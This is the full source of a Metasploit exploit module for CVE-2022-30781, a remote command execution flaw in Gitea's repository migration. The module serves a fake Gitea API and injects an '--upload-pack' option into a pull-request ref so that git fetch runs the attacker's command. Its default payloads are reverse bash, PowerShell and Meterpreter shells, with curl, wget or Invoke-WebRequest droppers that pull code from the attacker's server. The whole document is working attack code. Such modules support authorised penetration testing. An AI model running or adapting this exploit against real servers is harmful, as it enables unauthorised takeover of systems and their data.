Gitea Git Fetch Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Gitea  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gitea Git Fetch Remote Code Execution',        'Description' => %q{          This module exploits Git fetch command in Gitea repository migration          process that leads to a remote command execution on the system.          This vulnerability affect Gitea before 1.16.7 version.        },        'Author' => [          'wuhan005', # Original PoC          'li4n0', # Original PoC          'krastanoel' # MSF Module        ],        'References' => [          ['CVE', '2022-30781'],          ['URL', 'https://tttang.com/archive/1607/']        ],        'DisclosureDate' => '2022-05-16',        'License' => MSF_LICENSE,        'Platform' => %w[unix linux win],        'Arch' => ARCH_CMD,        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => %i[curl wget echo printf],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',                'CMDSTAGER::URIPATH' => '/payloads'              }            }          ]        ],        'DefaultOptions' => { 'WfsDelay' => 30 },        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options([      Opt::RPORT(3000),      OptString.new('USERNAME', [true, 'Username to authenticate with']),      OptString.new('PASSWORD', [true, 'Password to use']),      OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),    ])  end  def cleanup    super    return if @uid.nil? || @migrate_repo_created.nil?    [@repo_name, @migrate_repo_name].each do |name|      res = gitea_remove_repo(repo_path(name))      if res.nil? || res&.code == 200        vprint_warning("Unable to remove repository '#{name}'")      elsif res&.code == 404        vprint_warning("Repository '#{name}' not found, possibly already deleted")      else        vprint_status("Successfully cleanup repository '#{name}'")      end    end  end  def check    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?    v = get_gitea_version    gitea_login(datastore['username'], datastore['password'])    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')      return CheckCode::Appears("Version detected: #{v}")    end    CheckCode::Safe("Version detected: #{v}")  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e    return CheckCode::Unknown(e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e    return CheckCode::Detected(e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,         Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e    return CheckCode::Safe(e.message)  end  def primer    [      '/api/v1/version', '/api/v1/settings/api',      "/api/v1/repos/#{@migrate_repo_path}",      "/api/v1/repos/#{@migrate_repo_path}/pulls",      "/api/v1/repos/#{@migrate_repo_path}/topics"    ].each { |uri| hardcoded_uripath(uri) } # adding resources  end  def execute_command(cmd, _opts = {})    if target['Type'] == :win_dropper      # Git on Windows will pass the command to `sh.exe` and not `cmd`.      # This requires some adjustments:      # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`      # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.      # - Backslashes need to be escaped with `sh.exe`      cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }    end    vprint_status("Executing command: #{cmd}")    @repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_path = repo_path(@migrate_repo_name)    vprint_status("Creating repository \"#{@repo_name}\"")    @uid = gitea_create_repo(@repo_name)    vprint_good('Repository created')    vprint_status('Migrating repository')    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"    auth_token = rand_text_alphanumeric(6..15)    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)    @p = cmd  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e    fail_with(Failure::UnexpectedReply, e.message)  end  def exploit    unless datastore['AutoCheck']      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?      gitea_login(datastore['username'], datastore['password'])    end    start_service    primer    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded)    when :linux_dropper, :win_dropper      datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"      execute_cmdstager(background: true, delay: 1)    end  rescue Timeout::Error => e    fail_with(Failure::TimeoutExpired, e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e    fail_with(Failure::UnexpectedReply, e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e    fail_with(Failure::NoAccess, e.message)  end  def repo_path(name)    "#{datastore['username']}/#{name}"  end  def on_request_uri(cli, req)    case req.uri    when '/api/v1/version'      send_response(cli, '{"version": "1.16.6"}')    when '/api/v1/settings/api'      data = {        max_response_items: 50, default_paging_num: 30,        default_git_trees_per_page: 1000, default_max_blob_size: 10485760      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}"      data = {        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",        owner: { login: datastore['username'] }      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"      send_response(cli, '{"topics":[]}')    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"      data = [        {          base: {            ref: 'master'          },          head: {            ref: "--upload-pack=#{@p}",            repo: {              clone_url: './',              owner: { login: 'master' }            }          },          updated_at: '2001-01-01T05:00:00+01:00',          user: {}        }      ]      send_response(cli, data.to_json)    when datastore['CMDSTAGER::URIPATH']      super    end  endend